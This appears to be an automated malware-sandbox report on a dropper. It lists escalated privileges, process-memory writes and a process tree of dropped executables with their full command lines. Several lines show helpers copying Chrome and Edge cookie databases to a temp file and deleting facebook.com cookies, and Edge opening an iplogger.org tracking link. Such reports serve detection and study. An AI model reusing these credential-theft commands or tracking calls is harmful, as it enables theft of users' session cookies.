9avfIn5IigP_u4pj8JpAtsYA.exe 2512 WerFault.exe 2512 WerFault.exe 5488 WerFault.exe 5488 WerFault.exe 5428 ZNjEI97V8_TzeA2vWbShf6jj.exe 5428 ZNjEI97V8_TzeA2vWbShf6jj.exe 1444 22222.exe 1444 22222.exe 5604 WerFault.exe 5604 WerFault.exe 4832 WerFault.exe 4832 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 3208 3208 3208 3208 3208 3208 3208 3208 3208 3208 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
ZNjEI97V8_TzeA2vWbShf6jj.exepid process 5428 ZNjEI97V8_TzeA2vWbShf6jj.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exeWerFault.exesvchost.exeABhgA1_JcNSjunWCJULBHWy2.exesDD53xiAFXf45j9jMPz5AqNg.exes9CZCVkwZnCKvuAXID9kjcGG.exe_MiKooJ7I6X_jN040tJwAo75.exe4VhdBSLn5e31ry9R4lNsreSR.exe5VBfkYZvUYTuOQ4AHP9J6iE9.exe7036493.exevssvc.exe3529569.exepowershell.exeaskinstall53.exedescription pid process Token: SeDebugPrivilege 5076 KRSetp.exe Token: SeRestorePrivilege 344 WerFault.exe Token: SeBackupPrivilege 344 WerFault.exe Token: SeBackupPrivilege 344 WerFault.exe Token: SeTcbPrivilege 5112 svchost.exe Token: SeTcbPrivilege 5112 svchost.exe Token: SeTcbPrivilege 5112 svchost.exe Token: SeTcbPrivilege 5112 svchost.exe Token: SeTcbPrivilege 5112 svchost.exe Token: SeTcbPrivilege 5112 svchost.exe Token: SeDebugPrivilege 5336 ABhgA1_JcNSjunWCJULBHWy2.exe Token: SeDebugPrivilege 5616 sDD53xiAFXf45j9jMPz5AqNg.exe Token: SeDebugPrivilege 5624 s9CZCVkwZnCKvuAXID9kjcGG.exe Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeDebugPrivilege 5436 _MiKooJ7I6X_jN040tJwAo75.exe Token: SeDebugPrivilege 5420 4VhdBSLn5e31ry9R4lNsreSR.exe Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeDebugPrivilege 3876 5VBfkYZvUYTuOQ4AHP9J6iE9.exe Token: SeDebugPrivilege 4964 7036493.exe Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeBackupPrivilege 3060 vssvc.exe Token: SeRestorePrivilege 3060 vssvc.exe Token: SeAuditPrivilege 3060 vssvc.exe Token: SeDebugPrivilege 4288 3529569.exe Token: SeDebugPrivilege 4396 powershell.exe Token: SeRestorePrivilege 3060 vssvc.exe Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeShutdownPrivilege 3208 Token: SeCreatePagefilePrivilege 3208 Token: SeCreateTokenPrivilege 5380 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 5380 askinstall53.exe Token: SeLockMemoryPrivilege 5380 askinstall53.exe Token: SeIncreaseQuotaPrivilege 5380 askinstall53.exe Token: SeMachineAccountPrivilege 5380 askinstall53.exe Token: SeTcbPrivilege 5380 askinstall53.exe Token: SeSecurityPrivilege 5380 askinstall53.exe Token: SeTakeOwnershipPrivilege 5380 askinstall53.exe Token: SeLoadDriverPrivilege 5380 askinstall53.exe Token: SeSystemProfilePrivilege 5380 askinstall53.exe Token: SeSystemtimePrivilege 5380 askinstall53.exe Token: SeProfSingleProcessPrivilege 5380 askinstall53.exe Token: SeIncBasePriorityPrivilege 5380 askinstall53.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exen06BeJZiAJ9ZGyBXLy2bju0A.tmpCleaner Installation.exepid process 4696 msedge.exe 5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp 2308 Cleaner Installation.exe -
Suspicious use of SetWindowsHookEx 36 IoCs
Processes:
Installation.exeuAa_AbxThvGNSkQqNALUo28a.exemRMKJujcnUvhd7DjNMDCb8eN.exeFkdTCM26AHjprP7cVvGtWYus.exe1xwHsYY6JY2X9HJMmqNaZyN_.exe9avfIn5IigP_u4pj8JpAtsYA.exeVBzqFkfsDOMfFiW5eX98wd2t.execustomer3.exekUZysLnJ5VU1GTZZD0uqlySQ.exeLSBnF4NXGH5rmUEXTqMKoFvs.exemd8_8eus.exejfiag3g_gg.exekUZysLnJ5VU1GTZZD0uqlySQ.exen06BeJZiAJ9ZGyBXLy2bju0A.exe11111.exen06BeJZiAJ9ZGyBXLy2bju0A.tmpVC_redist.x64.exeVC_redist.x64.exe11111.exeVC_redist.x64.exe11111.exe11111.exejfiag3g_gg.exe11111.exe11111.exe11111.exeaskinstall53.exe22222.exeSetup.exeMediaBurner2.exeMediaBurner2.tmp22222.exezhangfei.exe22222.exezhangfei.exepid process 4584 Installation.exe 5164 uAa_AbxThvGNSkQqNALUo28a.exe 5216 mRMKJujcnUvhd7DjNMDCb8eN.exe 5388 FkdTCM26AHjprP7cVvGtWYus.exe 5428 1xwHsYY6JY2X9HJMmqNaZyN_.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5344 VBzqFkfsDOMfFiW5eX98wd2t.exe 6100 customer3.exe 5608 kUZysLnJ5VU1GTZZD0uqlySQ.exe 5860 LSBnF4NXGH5rmUEXTqMKoFvs.exe 1388 md8_8eus.exe 4872 jfiag3g_gg.exe 1432 kUZysLnJ5VU1GTZZD0uqlySQ.exe 6052 n06BeJZiAJ9ZGyBXLy2bju0A.exe 6084 11111.exe 5556 n06BeJZiAJ9ZGyBXLy2bju0A.tmp 4104 VC_redist.x64.exe 5648 VC_redist.x64.exe 444 11111.exe 6020 VC_redist.x64.exe 2876 11111.exe 5252 11111.exe 1120 jfiag3g_gg.exe 3292 11111.exe 4164 11111.exe 5484 11111.exe 5380 askinstall53.exe 1444 22222.exe 3800 Setup.exe 1344 MediaBurner2.exe 5380 askinstall53.exe 5492 MediaBurner2.tmp 2568 22222.exe 2080 zhangfei.exe 6352 22222.exe 6904 zhangfei.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EB7233922891E1DAD0434FBD52623647.exemsedge.exeFolder.exerUNdlL32.eXeWerFault.exedescription pid process target process PID 5008 wrote to memory of 5076 5008 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe PID 5008 wrote to memory of 5076 5008 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe PID 5008 wrote to memory of 4696 5008 EB7233922891E1DAD0434FBD52623647.exe msedge.exe PID 5008 wrote to memory of 4696 5008 EB7233922891E1DAD0434FBD52623647.exe msedge.exe PID 5008 wrote to memory of 4684 5008 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 5008 wrote to memory of 4684 5008 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 5008 wrote to memory of 4684 5008 EB7233922891E1DAD0434FBD52623647.exe Folder.exe PID 4696 wrote to memory of 4740 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4740 4696 msedge.exe msedge.exe PID 4684 wrote to memory of 5024 4684 Folder.exe Folder.exe PID 4684 wrote to memory of 5024 4684 Folder.exe Folder.exe PID 4684 wrote to memory of 5024 4684 Folder.exe Folder.exe PID 5008 wrote to memory of 4568 5008 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 5008 wrote to memory of 4568 5008 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 5008 wrote to memory of 4568 5008 EB7233922891E1DAD0434FBD52623647.exe Info.exe PID 2892 wrote to memory of 4828 2892 rUNdlL32.eXe rundll32.exe PID 2892 wrote to memory of 4828 2892 rUNdlL32.eXe rundll32.exe PID 2892 wrote to memory of 4828 2892 rUNdlL32.eXe rundll32.exe PID 4100 wrote to memory of 4828 4100 WerFault.exe rundll32.exe PID 4100 wrote to memory of 4828 4100 WerFault.exe rundll32.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 3644 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 3644 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4752 4696 msedge.exe msedge.exe PID 4696 wrote to memory of 4752 4696 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a647183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4608 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:13⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\uAa_AbxThvGNSkQqNALUo28a.exe"C:\Users\Admin\Documents\uAa_AbxThvGNSkQqNALUo28a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\HA0R0oOrvoeWkYK_NWGeEuqA.exe"C:\Users\Admin\Documents\HA0R0oOrvoeWkYK_NWGeEuqA.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\mRMKJujcnUvhd7DjNMDCb8eN.exe"C:\Users\Admin\Documents\mRMKJujcnUvhd7DjNMDCb8eN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\0OT08f9pu9hybIxDMQ79H_UI.exe"C:\Users\Admin\Documents\0OT08f9pu9hybIxDMQ79H_UI.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 2444⤵
- Program crash
-
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe"C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exeC:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\VBzqFkfsDOMfFiW5eX98wd2t.exe"C:\Users\Admin\Documents\VBzqFkfsDOMfFiW5eX98wd2t.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 3124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\ABhgA1_JcNSjunWCJULBHWy2.exe"C:\Users\Admin\Documents\ABhgA1_JcNSjunWCJULBHWy2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\maeApavXFRVyTdV1Ikfwiplv.exe"C:\Users\Admin\Documents\maeApavXFRVyTdV1Ikfwiplv.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe"C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exeC:\Users\Admin\Documents\5VBfkYZvUYTuOQ4AHP9J6iE9.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\KV7A28Kr66vqyPcOoBia8YpL.exe"C:\Users\Admin\Documents\KV7A28Kr66vqyPcOoBia8YpL.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\FkdTCM26AHjprP7cVvGtWYus.exe"C:\Users\Admin\Documents\FkdTCM26AHjprP7cVvGtWYus.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5388 -s 2924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
